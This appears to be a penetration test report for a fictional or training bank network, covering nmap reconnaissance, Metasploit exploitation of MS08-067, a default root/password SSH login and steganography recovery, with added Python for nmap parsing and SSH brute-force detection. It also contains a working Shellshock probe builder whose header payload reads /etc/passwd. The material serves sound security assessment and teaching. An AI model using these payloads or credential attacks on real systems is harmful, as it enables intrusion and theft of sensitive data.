XSecurity, LLC
Penetration Testing and Security Audit for FNB Financial Services
Warning: THIS DOCUMENT, AND ALL ACCOMPANYING MATERIALS, MAY CONTAIN INFORMATION THAT COULD
SEVERELY DAMAGE OR IMPACT THE INTEGRITY AND SECURITY OF THE ORGANIZATION IF DISCLOSED PUBLICLY.
THIS DOCUMENT, AND ALL ACCOMPANYING MATERIALS, SHOULD BE SAFEGUARDED AT ALL TIMES AND
MAINTAINED IN A SECURE AREA WHEN NOT IN USE. XSECURITY, LLC ASSUMES NO RESPONSIBILITY OR LIABILITY
FOR THE SECURITY OF THIS DOCUMENT OR ANY ACCOMPANYING MATERIALS AFTER DELIVERY TO THE
ORGANIZATION NAMED HEREIN. IT IS THE ORGANIZATION’S RESPONSIBILITY TO SAFEGUARD THIS MATERIAL
AFTER DELIVERY.
THIS REPORT CONTAINS PROPRIETARY INFORMATION THAT IS NOT TO BE SHARED, COPIED, DISCLOSED OR
OTHERWISE DIVULGED WITHOUT THE EXPRESS WRITTEN CONSENT OF XSECURITY OR THEIR DESIGNATED
REPRESENTATIVE. USE OF THIS REPORTING FORMAT BY OTHER THAN XSECURITY OR ITS SUBSIDIARIES IS STRICTLY
PROHIBITED AND MAY BE PROSECUTED TO THE FULLEST EXTENT OF THE LAW.
Disclaimer: THE RECOMMENDATIONS CONTAINED IN THIS REPORT ARE BASED ON INDUSTRY STANDARD
“BEST PRACTICES”. BEST PRACTICES ARE, BY NECESSITY, GENERIC IN NATURE AND MAY NOT TAKE INTO ACCOUNT
EXACERBATING OR MITIGATING CIRCUMSTANCES. THESE RECOMMENDATIONS, EVEN IF CORRECTLY APPLIED, MAY
CAUSE CONFLICTS IN THE OPERATING SYSTEM OR INSTALLED APPLICATIONS. ANY RECOMMENDED CHANGES TO
THE OPERATING SYSTEM OR INSTALLED APPLICATION SHOULD FIRST BE EVALUATED IN A NON-PRODUCTION
ENVIRONMENT BEFORE BEING DEPLOYED IN YOUR PRODUCTION NETWORK.
XSECURITY, LLC
SUITE 180 ● ALBUQUERQUE, NM 87048 USA
PHONE 505.XXX.XXXX ● FAX 505.XXX.XXXX
Document Details
Classification Confidential
Version 1.0
Dec 30th, 2016   v1.2   Geeta Singh          Checked for formatting and proofreading
Dec 21st, 2016   v1.1   Abhijitt Chougulle   Edited and made changes to content
Recipient
Contact
Email abhijitt.chougulle@gmail.com
Table of Contents
Document Details ... 3
Version History Information ... 3
Recipient ... 3
Penetration Testing Team Members ... 4
Contact ... 4
1.0 Executive Summary ... 7
1.1. Project Scope ... 8
1.2. Project Objectives ... 8
1.3. Target Systems ... 8
1.4. Assumptions ... 9
1.5. Timeline ... 9
1.6. Summary of Evaluation ... 9
1.7. Finding Rating Levels ... 10
1.8. Risk Assessment Matrix ... 10
1.1. Summary of Findings ... 11
1.2. Summary of Recommendation ... 12
1.2.1. Personnel ... 12
1.2.2. Policies and Procedures ... 12
1.2.3. Critical Vulnerabilities ... 12
1.2.4. Identification and Authentication ... 13
1.2.5. Intrusion Detection ... 13
1.2.6. Conclusion ... 14
1.3. Testing Methodology ... 14
1.3.1. Planning ... 14
1.3.2. Exploitation ... 14
1.3.3. Reporting ... 14
2.0 Comprehensive Technical Report ... 15
[Challenge 1:] Information Gathering ... 15
controls to ensure compliance with existing policies and to ensure that timely and adequate
review of log files is occurring.
The assessment performed was focused on FNB Financial Services' internal network and its
related application infrastructure. This report is intended to be an overall assessment of the FNB
Financial Services network and of those systems and subnets that fall within the scope of this
project.
Furthermore, the findings in this report reflect the conditions found during the testing, and do not
necessarily reflect current conditions.
The objective of FNB Financial Services' network and application assessment is to determine the
overall security posture by analyzing all reachable transactions, user input variables, and application
components that reside on the in-scope network systems. For the testing, we attempted to perform a
black-box test, i.e. starting without prior knowledge of the hosts or any credentials.
The objective of the security assessment and penetration test of the network infrastructure
supporting the application is to determine the overall security of the network segments and hosts
within the scope of the engagement.
1.3. Target Systems
The following table lists all devices that were targeted during this assessment.
1.4. Assumptions
We assumed that all IP addresses are public IP addresses and that the organization has implemented
the security policies available to it.
1.5. Timeline
- Perform broad scans to identify potential areas of exposure and services that may act as
  entry points
- Perform targeted scans and manual investigation to validate vulnerabilities
- The test identified components to gain access to:
  o <10 IP addressed devices>
- Identify and validate vulnerabilities
- Rank vulnerabilities based on threat level, loss potential, and likelihood of exploitation
- Perform supplemental research and development activities to support analysis
- Identify issues of immediate consequence and recommend solutions
- Develop long-term recommendations to enhance security
- Transfer knowledge
During the network-level security checks we probed the ports open on the various servers and
identified the services running on them, along with any known security holes in those services. At the
web application level, we checked the web servers' configuration and, more importantly,
the logical errors in the web application itself.
In the following Findings section, XSecurity, LLC uses a rating system of stars (*) to indicate
the severity of each finding. All findings are vulnerabilities that carry a business risk to
FNB Financial Services.
5 Stars (*****)  Critical  Intruders can easily gain control of hosts and the network. This
                           needs immediate attention.
4 Stars (****)   High      Intruders can possibly gain control of the host, or there may
                           be potential leakage of highly sensitive information. This
Xsecurity, LLC CONFIDENTIAL Penetration Test Report for
FNB Financial Service
Rating  Level   Score range
L       Low     1-4
M       Medium  4-12
H       High    12-25
Table 4: Threat Levels
1.1. Summary of Findings
This General Opinion will discuss several overarching concerns that became apparent during the
Penetration Testing. This discussion is intended to provide more in-depth and detailed analysis of
the various issues brought forth in the Executive Summary and provides further illumination on
the more significant risks to FNB Financial Services.
1.2.1. Personnel
While several people involved with maintaining the network and systems have expressed
concerns over the access given to entities (such as developers), the FNB Financial Services
security architecture does not provide, by design, any means of limiting these individual's or
group's network infrastructure access. FNB Financial Services tends to accept the risks
associated with having a completely open internal architecture in order to accommodate the
fluid and changing nature of the environment. However, a documented rationale should
accompany any risks that are accepted.
FNB Financial Services has several knowledgeable and skilled individuals in the Information
Technology department. These individuals are aware of security-related issues and
understand that their internal systems are completely open and accessible. They differ in their
opinions as to the severity of this situation. The situation entrusts a great deal of power and
responsibility, to the point that any one of a handful of administrators, acting independently,
has the capability to compromise a system without any of the other administrators being
aware that any misuse has occurred. This requires a great deal of trust in these administrators,
which is evidently well placed; however, future employees who may hold these positions
may not be as trustworthy. Without measures in place to monitor the activity of such
individuals, current or future intrusions or compromises may not be detectable.
Historically, user privileges were managed by the system's Reference Monitor, an integral
part of the operating system. Any change in a user's privilege level was therefore enforced
immediately by the operating system, so there was no period of time during which the privileges
in effect differed from the privileges the user was invoking. In networked environments, the
practice of granting privilege at the time of log-in still exists. However, because there is no
centralized Reference Monitor directly tied into each and every operating system on the network,
a change in the user's privilege level is not registered until the user logs off the network and
then logs back on. This is a time-of-check to time-of-use (TOCTOU) problem. Identification and
Authentication services, when coupled with a timely service, can resolve this issue because they
force users to present their credentials before accessing any resource on the network. This
provides an opportunity for the privileges to be re-checked at each access, as well as ensuring
the authenticity of the user ID accessing the resource.
1.2.6. Conclusion
Regardless of the frequency of vulnerability testing, no critical system can be considered
acceptably protected unless both the network segments and the critical hosts/servers are
monitored constantly for signs of abuse and intrusion attempts. Because new exploits and
vulnerabilities within devices and network operating systems are discovered regularly, it is
impossible to test a network completely, giving 100 percent assurance of being impervious to
penetration either from within or from outside. Additionally, FNB Financial Services has
chosen a trust model in which the application of stronger internal controls is more difficult
than in a more restrictive trust model. Therefore, the easiest method of detecting misuses
would be some type of intrusion detection system that is both network based and can do user
profiling. Without appropriate identification and authentication of users, referencing abuses
to specific individuals becomes unreliable. Without appropriate audit controls to ensure
compliance with policies, the policies and procedures themselves become untenable.
XSecurity, LLC believes the corrective actions and recommendations in this report will
improve FNB Financial Services' ability to avoid breaches of information security.
1.3.1. Planning
During planning, we gather information about the server on which the web application is
installed. We then identify path information and identifiable software, and determine the
versions that are running.
1.3.2. Exploitation
Using the information gathered during planning, we search for vulnerabilities in each piece of
software and each service discovered, and then attempt to exploit them.
1.3.3. Reporting
Based on the results of the first two steps, we analyze the findings. Our risk rating is
based on this calculation:
Risk = Threat * Vulnerability * Impact
After calculating the risk rating, we document each risk and how to mitigate
it.
case that is very much true because Zenmap will give you an interactive graphical map of your
network.
SolarWinds: IT monitoring and management tools are built for SysAdmins and network
Nessus : Nessus is a remote security scanning tool, which scans a computer and raises an alert
if it discovers any vulnerabilities that malicious hackers could use to gain access to any
computer you have connected to a network.
Methodology:
We needed to identify all the machines in the network, and no details were provided to us.
From the Windows machine, we first found the machine's gateway with ipconfig /all, i.e.
192.168.1.1 (screenshot given below).
Figure 1.1
Then, with the help of SolarWinds, discovered the other network addresses, i.e.
172.19.19.1, 172.17.0.1 and 10.10.0.1 (screenshot given below).
Figure 1.2
With the Zenmap tool and the command nmap -sn -T4 -v 172.19.19.1/24, found live hosts
172.19.19.1, 172.19.19.2, 172.19.19.3, 172.19.19.4, 172.19.19.5, 172.19.19.6, 172.19.19.7,
172.19.19.8, 172.19.19.9 and 172.19.19.10.
Figure 1.3
With the Zenmap tool and the command nmap -sn -T4 -v 172.17.0.1/24, found live hosts
172.17.0.1, 172.17.0.2 and 172.17.0.3.
Figure 1.4
With the Zenmap tool and the command nmap -sn -T4 -v 10.10.0.1/24, found live hosts 10.10.0.1,
10.10.0.2 and 10.10.0.3.
Figure 1.5
Note that -sn is a host-discovery sweep only: a host that drops the discovery probes (ICMP echo and
the TCP probes to ports 80 and 443) will not appear unless the scan runs on the same Ethernet
segment, where nmap falls back to ARP requests that a host firewall cannot suppress.
All Host Topology Diagram:
Operating System and version of Machine 10.10.0.1: Microsoft Windows Server 2003 with
Service Pack 2 (SP2) ver 5.2 and Build 3790
With the Zenmap tool and the command nmap -p 445 --script smb-os-discovery 10.10.0.1, discovered the
operating system and host name of machine 10.10.0.1
Figure 1.6
With the Zenmap tool and the command nmap -p 445 --script smb-os-discovery 10.10.0.2, discovered the
operating system and host name of machine 10.10.0.2
Figure 1.7
With the Zenmap tool and the command nmap -p 445 --script smb-os-discovery 10.10.0.3, discovered the
operating system and host name of machine 10.10.0.3
Figure 1.8
Operating System and version of Machine 172.17.0.1:
Microsoft Windows Server 2003 with Service Pack 2 (SP2) ver 5.2 and Build 3790
With the Zenmap tool and the command nmap -p 445 --script smb-os-discovery 172.17.0.1, discovered the
operating system and host name of machine 172.17.0.1
AND
Figure 1.9
The Zenmap tool could not discover the operating system of machine 172.17.0.3,
so the Nessus tool was used to discover the operating system of 172.17.0.3. The smb-os-discovery
script only answers when the host exposes SMB on port 445; if 445 is closed or filtered, or the
host is not Windows, the script stays silent and TCP/IP fingerprinting (nmap -O) or a scanner such
as Nessus is the next step.
Figure 1.10
With the Zenmap tool and the command nmap -p 445 --script smb-os-discovery 172.19.19.1, discovered the
operating system and host name of machine 172.19.19.1
AND
Figure 1.11
With the Zenmap tool and the command nmap -p 445 --script smb-os-discovery 172.19.19.3, discovered the
operating system and host name of machine 172.19.19.3
AND
With the Zenmap tool and the command nmap -p 445 --script smb-os-discovery 172.19.19.4, discovered the
operating system and host name of machine 172.19.19.4
Figure 1.11
The Zenmap tool could not discover the operating system of machine 172.19.19.5,
so the Nessus tool was used to discover the operating system of 172.19.19.5.
Figure 1.11
Figure 1.12
Operating System and version of Machine 172.19.19.7:
Microsoft Windows Server 2008 Standard with Service Pack 1 (SP1) ver 6.0 and Build 6001
With the Zenmap tool and the command nmap -p 445 --script smb-os-discovery 172.19.19.7, discovered the
operating system and host name of machine 172.19.19.7
AND
Operating System and version of Machine 172.19.19.8:
Microsoft Windows XP
With the Zenmap tool and the command nmap -p 445 --script smb-os-discovery 172.19.19.8, discovered the
operating system and host name of machine 172.19.19.8
Figure 1.13
With the Zenmap tool and the command nmap -p 445 --script smb-os-discovery 172.19.19.9, discovered the
operating system and host name of machine 172.19.19.9
AND
Operating System and version of Machine 172.19.19.10:
Microsoft Windows 7 Ultimate with Service Pack 1 (SP1) ver 6.1 and Build 7601
With the Zenmap tool and the command nmap -p 445 --script smb-os-discovery 172.19.19.10, discovered the
operating system and host name of machine 172.19.19.10
Figure 1.14
Figure 1.14
Open ports in all the machines / Services running on all the open ports
Figure 1.15
Figure 1.16
Open ports and services running on Machine 10.10.0.3:
With the Zenmap tool and the command nmap -sS -sV -T4 -v 10.10.0.3/24, discovered the open ports and
services running on machine 10.10.0.3. Note that the /24 suffix makes each of these commands scan
the whole subnet rather than the named host alone (nmap -sS -sV -T4 -v 10.10.0.3 limits it to the
one machine), and that -sS, the SYN scan, requires root privileges.
Figure 1.17
Figure 1.18
Figure 1.19
Figure 1.20
Open ports and services running on Machine 172.19.19.1:
With the Zenmap tool and the command nmap -sS -sV -T4 -v 172.19.19.1/24, discovered the open ports and
services running on machine 172.19.19.1
Figure 1.21
With the Zenmap tool and the command nmap -sS -sV -T4 -v 172.19.19.2/24, discovered the open ports and
services running on machine 172.19.19.2
Figure 1.22
Figure 1.23
Figure 1.24
Figure 1.25
Figure 1.26
Figure 1.27
Open ports and services running on Machine 172.19.19.8:
With the Zenmap tool and the command nmap -sS -sV -T4 -v 172.19.19.8/24, discovered the open ports and
services running on machine 172.19.19.8
Figure 1.28
Figure 1.29
Figure 1.19
THE LIST GIVEN BELOW CAN BE USED AS A REFERENCE FOR FURTHER PENTESTING:
LIST OF ALL IP ADDRESSES OF ALL MACHINES / OPERATING SYSTEM AND VERSION / HOST NAME / OPEN PORTS ON
THE RESPECTIVE MACHINE AND SERVICES RUNNING ON ALL OPEN PORTS
Sr no  IP address    Operating system and version                                       Host name        Open ports and services
1      172.19.19.1   Microsoft Windows Server 2003 with Service Pack 2 (SP2) ver 5.2,   GNAT             135 msrpc, 139 netbios-ssn, 445 microsoft-ds,
                     Build 3790                                                                           1025 msrpc, 3389 ms-wbt-server
12     172.17.0.2    Microsoft Windows Server 2008 R2 Enterprise Service Pack 1 (SP1),  WIN-AG46I02QBKJ  21 tcpwrapped, 80 http, 135 msrpc, 139 netbios-ssn,
                     ver 6.1 Build 7601                                                                   445 netbios-ssn, 3389 ms-wbt-server,
                                                                                                          49152, 49153, 49154, 49155, 49156, 49157 msrpc
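The inventory table above was assembled by hand from Zenmap screenshots. The following added example (not part of the original report or of any tool it names) builds the same columns directly from the XML that nmap writes with -oX, so the table for all 16 hosts comes from one scan file and cannot drift from what the scanner saw. The XML embedded below is constructed to resemble the output of nmap -sS -sV -p 135,139,445,1025,3389 --script smb-os-discovery -oX scan.xml 172.19.19.1 and is not a capture from the FNB network; the closed and filtered ports in it are there to show that only open ports are reported.

```python
"""Host inventory (IP, OS, host name, open ports/services) from nmap -oX output.

Added example, not from the original report.  SAMPLE_XML is constructed."""
import re
import xml.etree.ElementTree as ET

SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host>
    <status state="up"/>
    <address addr="172.19.19.1" addrtype="ipv4"/>
    <address addr="00:0C:29:AA:BB:CC" addrtype="mac"/>
    <ports>
      <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc"/></port>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="1025"><state state="open"/><service name="msrpc"/></port>
      <port protocol="tcp" portid="3389"><state state="open"/><service name="ms-wbt-server"/></port>
      <port protocol="tcp" portid="80"><state state="filtered"/><service name="http"/></port>
      <port protocol="tcp" portid="22"><state state="closed"/><service name="ssh"/></port>
    </ports>
    <hostscript>
      <script id="smb-os-discovery" output="&#10;  OS: Windows Server 2003 3790 Service Pack 2 (Windows Server 2003 5.2)&#10;  Computer name: GNAT&#10;  NetBIOS computer name: GNAT"/>
    </hostscript>
  </host>
</nmaprun>
"""

# nmap writes the script output with newlines as &#10; so the lines survive as attribute text
OS_RE = re.compile(r"^\s*OS:\s*(.+?)\s*$", re.M)
NAME_RE = re.compile(r"^\s*Computer name:\s*(\S+)", re.M)


def parse_inventory(xml_text):
    """One dict per host that is up: ip, os, hostname, ports (sorted (port, service) pairs)."""
    rows = []
    for host in ET.fromstring(xml_text).iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        ip = next((a.get("addr") for a in host.iter("address") if a.get("addrtype") == "ipv4"), None)
        ports = []
        for p in host.iter("port"):
            if p.find("state").get("state") != "open":
                continue                      # closed/filtered ports are not part of the inventory
            svc = p.find("service")
            ports.append((int(p.get("portid")), svc.get("name") if svc is not None else "unknown"))
        os_name, hostname = "unknown", "unknown"
        for script in host.iter("script"):
            if script.get("id") == "smb-os-discovery":
                out = script.get("output", "")
                m = OS_RE.search(out)
                if m:
                    os_name = m.group(1)
                m = NAME_RE.search(out)
                if m:
                    hostname = m.group(1)
        rows.append({"ip": ip, "os": os_name, "hostname": hostname, "ports": sorted(ports)})
    return rows


def format_table(rows):
    """Plain-text rows in the same column order as the report's inventory table."""
    lines = []
    for n, r in enumerate(rows, 1):
        services = ", ".join("%d %s" % (port, svc) for port, svc in r["ports"])
        lines.append("%-3d %-15s %-60s %-16s %s" % (n, r["ip"], r["os"], r["hostname"], services))
    return "\n".join(lines)


if __name__ == "__main__":
    print(format_table(parse_inventory(SAMPLE_XML)))
```

Run it against the real scan file with parse_inventory(open("scan.xml").read()); hosts for which smb-os-discovery returned nothing (such as 172.17.0.3 and 172.19.19.5 above) come out with "unknown" in the OS column rather than silently disappearing, which is the behaviour you want when the table is the reference for the next engagement.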
CHALLENGE 2:
Objective:
Exploit and root the machine named Operations and do the following:
1. Present the hash value of the file “Employee Insurance Details.xlsx” hidden somewhere
in the user folders.
2. FNB management has discovered one of their employees has transferred sensitive
information outside the organization using their machine. The network admin tried to
ascertain this but could not find anything concrete. He however did discover some large
images in a folder named Personal. This was in violation to the organization’s policy of
not storing any personal information on office computers. As a penetration tester, your
task is to verify if these images were used to send sensitive information and present the
hidden message in the pen testing report.
IP address of all Machines | Operating system and their versions | Host names | Open ports in respective machine | Services running in all open ports
Threat Description: This is a remote code execution vulnerability. An attacker who
successfully exploited this vulnerability could take complete control of an affected system
remotely. On Microsoft Windows 2000-based, Windows XP-based, and Windows Server 2003-
based systems, an attacker could exploit this vulnerability over RPC without authentication and
could run arbitrary code. If an exploit attempt fails, this could also lead to a crash in Svchost.exe.
If the crash in Svchost.exe occurs, the Server service will be affected. The Server service
provides file, print, and named pipe sharing over the network.
The vulnerability is caused by the Server service, which does not correctly handle specially
crafted RPC requests.
Tools Used:
Nessus : Nessus is a remote security scanning tool, which scans a computer and raises an alert
if it discovers any vulnerabilities that malicious hackers could use to gain access to any
computer you have connected to a network.
QuickStego : QuickStego lets you hide text in pictures so that only other users of QuickStego
can retrieve and read the hidden secret messages. Once text is hidden in an image the saved
picture is still a 'picture', it will load just like any other image and appear as it did before.
Methodology:
Challenge 2.1: Present the hash value of the file "Employee Insurance Details.xlsx" hidden
somewhere in the user folders.
With the help of the Nessus tool, performed the vulnerability assessment and found the vulnerability
MS08-067, which is a remote code execution vulnerability in the Server service.
Figure 2.1.1
Then searched for the exploit module on the Rapid7 website, as shown below.
Figure 2.1.2
Figure 2.1.3
Using the Kali Linux machine, started the exploit process by opening a command-line terminal,
typing msfconsole and pressing Enter. This launched msfconsole.
Figure 2.1.4
Then searched for the exploit, as shown in Figure 2.1.5 below.
Figure 2.1.5
Selected the module found in the search results with the use command, as shown in Figure 2.1.6.
Figure 2.1.6
Then used the show payloads command to list the payload options and selected one.
Figure 2.1.7
Figure 2.1.8
Figure 2.1.9
Then typed the show options command, as shown below, to check LHOST, RHOST and RPORT.
Figure 2.1.10
Then typed the show options command, as shown below, to check LHOST, RHOST and RPORT.
Figure 2.1.11
Figure 2.1.13
After downloading the file, extracted the md5sum of "Employee Insurance Details.xlsx".
Figure 2.1.14
Recommendation:
Block TCP ports 139 and 445 at the firewall. These ports are used to initiate a connection with
the affected component, so blocking them at the firewall will help protect systems behind that
firewall from attempts to exploit this vulnerability. Microsoft recommends blocking all unsolicited
inbound communication from the Internet to help prevent attacks that may use other ports.
The firewall rule is a workaround only: the actual fix is to install the MS08-067 security update
(KB958644) on every affected host, and hosts for which no update exists should be retired.
Microsoft has also ended support for Windows XP. It is recommended not to use Windows XP, since no
security patches or updates are available for it any more.
3. Challenge 2.2: FNB management has discovered one of their employees has transferred
sensitive information outside the organization using their machine. The network admin
tried to ascertain this but could not find anything concrete. He did, however, discover
some large images in a folder named Personal. This was in violation of the organization's
policy of not storing any personal information on office computers. As a penetration
tester, your task is to verify whether these images were used to send sensitive information and
present the hidden message in the pen testing report.
With the help of the Nessus tool, performed the vulnerability assessment and found the vulnerability
MS08-067, which is a remote code execution vulnerability (the same access path as in Challenge 2.1).
Figure 2.1.1
Figure 2.1.2
Searched for the exploit module on the Rapid7 website; the search results are given below.
Figure 2.1.3
We launched a new command-line terminal, typed msfconsole and pressed Enter. This
launched msfconsole.
Figure 2.1.4
Then searched for the exploit, as shown in the figure below.
Figure 2.1.5
Then typed the use command with the module found, as shown in the figure below.
Figure 2.1.5
Displayed below is the result of the use command with the module found.
Figure 2.1.6
Figure 2.1.8
Then typed the show options command, as shown below, to check LHOST, RHOST, RPORT and LPORT.
Figure 2.1.9
Then set LHOST, RHOST, RPORT and LPORT, and ran exploit.
Figure 2.1.9
After gaining the meterpreter session, searched for jpg and bmp files with the meterpreter search command and found
the files in C:\Documents and Settings\Administrator\My Documents\Personal.
Figure 2.1.1
After the search, downloaded the jpg and bmp files from C:\Documents and
Settings\Administrator\My Documents\Personal.
Figure 2.1.12
After downloading the Personal folder, changed its access permissions, copied the folder from /root to
/var/www and started the Apache server.
Figure 2.1.11
Through the Apache web server, browsed the directory containing the jpg and bmp files.
Figure 2.1.12
Thumbnail view of the jpg and bmp files in the folder.
Figure 2.1.12
QuickStego lets you hide text in pictures so that only other users of QuickStego can retrieve and
read the hidden secret messages. Of the four jpg/bmp files, the hidden message was retrieved with this
tool from the bmp file The_sower.bmp.
Figure 2.1.13
Recommendation: Further strengthen the IT security policy so that information access is granted on a
role-based and need-to-know basis. Conduct an internal audit to verify that this has been
implemented and is being followed. Since the message left the organization inside an image file,
which ordinary content filters do not inspect, the policy against personal files on office computers
needs an enforcement mechanism: periodic review of user folders and monitoring of large outbound
file transfers.
CHALLENGE 3:
Objective:
Compromise the Ubuntu machine in the network. The challenge requires you to present the
hash value of the file "Customer Data.xlsx". This file contains customer sensitive
information such as credit card details.
IP address of all Machines | Operating system and their versions | Host names | Open ports in respective machine | Services running in all open ports
Threat Description: The GNU Bash vulnerability referred to as Shellshock or the "Bash Bug" (CVE-2014-6271)
allows remote attackers to execute arbitrary code, under certain conditions, by placing commands after a
function definition in an environment variable: bash executes the trailing commands when it imports the
variable. Any service that copies attacker-controlled input into environment variables before invoking
bash, such as a CGI script behind a web server, is exposed.
Tools Used:
Dirbuster :
DirBuster is a multi threaded java application designed to brute force directories and files names
on web/application servers. Often is the case now of what looks like a web server in a state of
default installation is actually not, and has pages and applications hidden within. DirBuster
attempts to find these.
Burpsuite:
Burp Suite is an integrated platform for performing security testing of web applications. Its
various tools work seamlessly together to support the entire testing process, from initial mapping
and analysis of an application's attack surface, through to finding and exploiting security
vulnerabilities.
Methodology:
Scanned for vulnerabilities.
Figure 3.1
With the help of the DirBuster tool, brute-forced directory and file names on the Ubuntu server and found the
following files and the cgi-bin directory.
Figure 3.2
Figure 3.3
Browsed the URL given below, intercepted the request in the Burp Suite tool, and it showed that the page was a
demonstration of the Shellshock vulnerability.
Figure 3.4
With the help of the script given below (the payload placed in the request header), executed commands on the server.
Figure 3.5
With the script given below, found the folders on the machine under /home/Jason.
Figure 3.6
With the script given below, found the file Customer Data.xlsx, whose md5sum needs to be extracted.
Figure 3.7
With the script given below, extracted the md5sum of Customer Data.xlsx.
Figure 3.8
Recommendation: Update Bash on all affected servers to a patched version, and keep the servers current with the
latest security updates. Verify the fix after patching by re-running the standard check,
env x='() { :;}; echo vulnerable' bash -c "echo test", which must print only "test". Where the CGI scripts
under cgi-bin are not needed, remove them or disable the CGI handler entirely, since they are what turned a
local bash bug into remote code execution.
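The following added example (not part of the original report) scripts the two halves of this finding: bash_is_vulnerable() runs the canonical local check against whatever bash is installed on the machine running it, and build_cgi_probe() produces the raw HTTP request of the kind intercepted in Burp Suite above, with the payload carried in the User-Agent header, which Apache exports to the CGI process as the HTTP_USER_AGENT environment variable. The CGI path, the command, the target address and the canary string are assumptions, not values from the engagement; the response checker insists on the canary appearing without the payload text, so a page that merely echoes the User-Agent back is not mistaken for execution.

```python
"""Shellshock (CVE-2014-6271): local bash check, CGI probe builder, response check.

Added example, not from the original report.  Path, command, canary and
target are assumed values."""
import os
import shutil
import subprocess

CANARY = "XSEC-SHELLSHOCK-CANARY-7f3a"


def bash_is_vulnerable(bash=None):
    """True if bash runs the command that follows a function definition in an
    environment variable, False if patched, None if no bash is installed."""
    bash = bash or shutil.which("bash")
    if bash is None:
        return None
    env = dict(os.environ)
    env["X"] = "() { :; }; echo " + CANARY      # function body, then the trailing command
    proc = subprocess.run([bash, "-c", "echo probe"], env=env,
                          capture_output=True, text=True)
    return CANARY in proc.stdout


def build_cgi_probe(host, path="/cgi-bin/status.cgi", command="/bin/cat /etc/passwd"):
    """Raw HTTP/1.1 request.  The two leading echos end the CGI header block so the
    command output is returned in the HTTP body instead of being dropped as a bad header."""
    payload = "() { :; }; echo; echo; echo %s; %s" % (CANARY, command)
    return ("GET %s HTTP/1.1\r\n"
            "Host: %s\r\n"
            "User-Agent: %s\r\n"
            "Connection: close\r\n\r\n") % (path, host, payload)


def response_shows_execution(response_text):
    """Execution is confirmed only if the canary comes back on its own; a body that
    reflects the whole User-Agent string (payload included) does not count."""
    body = response_text.split("\r\n\r\n", 1)[-1]
    return CANARY in body and "() {" not in body


if __name__ == "__main__":
    print("local bash vulnerable:", bash_is_vulnerable())
    print(build_cgi_probe("192.0.2.10"))    # assumed target address (TEST-NET), not from the report
```

After the Bash package is updated, bash_is_vulnerable() is the same test as the one-liner in the recommendation and can be dropped into a post-patch verification script; build_cgi_probe() is the request to replay through Burp Suite against each cgi-bin script found by DirBuster to confirm none of them still reaches a vulnerable shell.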
CHALLENGE 4:
Objective:
Compromise the Cent OS machine in the network. The challenge requires you to present the
hash value of the file named "Terms of Service". This file contains sensitive agreements between
FNB and their customers.
IP address of all Machines | Operating system and their versions | Host names | Open ports in respective machine | Services running in all open ports
Threat Description:
An SSH brute-force attack automatically and systematically attempts to guess the correct username
and password combination for a service. Its goal is to find valid logins and leverage them to gain
access to a network and extract sensitive data, such as password hashes and tokens.
Tools Used:
Putty:
PuTTY is an SSH and telnet client, developed originally by Simon Tatham for the Windows
platform. PuTTY is open source software that is available with source code and is developed and
supported by a group of volunteers.
Methodology:
Performed the vulnerability assessment with the help of the Greenbone Security Assistant and found the
SSH brute-force login with default credentials vulnerability shown below.
Figure 4.1
Further extracted the default login credentials, i.e. username root and password password, as shown
below.
Figure 4.2
With the help of the PuTTY tool, logged in to the server with the default credentials (username root, password
password).
Figure 4.3
Once connected to the server, listed the directory structure with the ls command and searched for the file
named Terms of Service.pdf, whose md5sum was to be calculated. We found the file in the /home/Admin/Documents
folder. Finally extracted the md5sum of the pdf file, as shown in the figure below.
Figure 4.4
Recommendation: Always follow a standard password policy, i.e. a minimum of 8 characters, alphanumeric with special
characters, and non-guessable strong passwords. Change any default credentials before a system goes into service, and
do not allow the root account to log in directly over SSH (PermitRootLogin no in sshd_config, with key-based
authentication for administrators), so that one guessed password does not immediately yield full control of the host.
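The threat description above names the attack; the host should also have been watched for it. The following added example (not part of the original report) runs the detection logic a SOC would apply to the CentOS host's sshd log: many failed logins from one source inside a short window, followed by a success from that same source, which is the signature of a guessed default password. The log lines are constructed in OpenSSH's syslog format and are not from the FNB host; the threshold and window are assumed starting points to be tuned to the environment.

```python
"""SSH credential-guessing detection over sshd syslog lines.

Added example, not from the original report.  SAMPLE_LOG is constructed."""
import re
from collections import defaultdict
from datetime import datetime

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2")

SAMPLE_LOG = """\
Dec 21 10:15:01 centos sshd[2201]: Failed password for root from 172.19.19.10 port 51022 ssh2
Dec 21 10:15:04 centos sshd[2203]: Failed password for root from 172.19.19.10 port 51024 ssh2
Dec 21 10:15:07 centos sshd[2205]: Failed password for root from 172.19.19.10 port 51026 ssh2
Dec 21 10:15:11 centos sshd[2207]: Failed password for root from 172.19.19.10 port 51028 ssh2
Dec 21 10:15:14 centos sshd[2209]: Failed password for root from 172.19.19.10 port 51030 ssh2
Dec 21 10:15:18 centos sshd[2211]: Failed password for root from 172.19.19.10 port 51032 ssh2
Dec 21 10:15:40 centos sshd[2213]: Accepted password for root from 172.19.19.10 port 51034 ssh2
Dec 21 10:20:05 centos sshd[2300]: Failed password for invalid user admin from 10.10.0.2 port 40001 ssh2
Dec 21 10:21:00 centos sshd[2310]: Accepted publickey for deploy from 10.10.0.3 port 40500 ssh2
Dec 21 10:21:30 centos sshd[2311]: pam_unix(sshd:session): session opened for user deploy by (uid=0)
"""


def parse_events(text):
    """Yield a dict per Failed/Accepted line; other sshd lines are ignored."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ev = m.groupdict()
            ev["time"] = datetime.strptime(ev["ts"], "%b %d %H:%M:%S")   # syslog omits the year
            yield ev


def detect(text, threshold=5, window_s=60):
    """Return {'brute_force': {ip: peak failures inside any window_s span},
               'suspicious_logins': [(ip, user, method)]} for successes from flagged sources."""
    failures = defaultdict(list)
    successes = []
    for ev in parse_events(text):
        if ev["result"] == "Failed":
            failures[ev["ip"]].append(ev["time"])
        else:
            successes.append(ev)
    brute = {}
    for ip, times in failures.items():
        times.sort()
        peak = 0
        for i in range(len(times)):                      # sliding window over sorted timestamps
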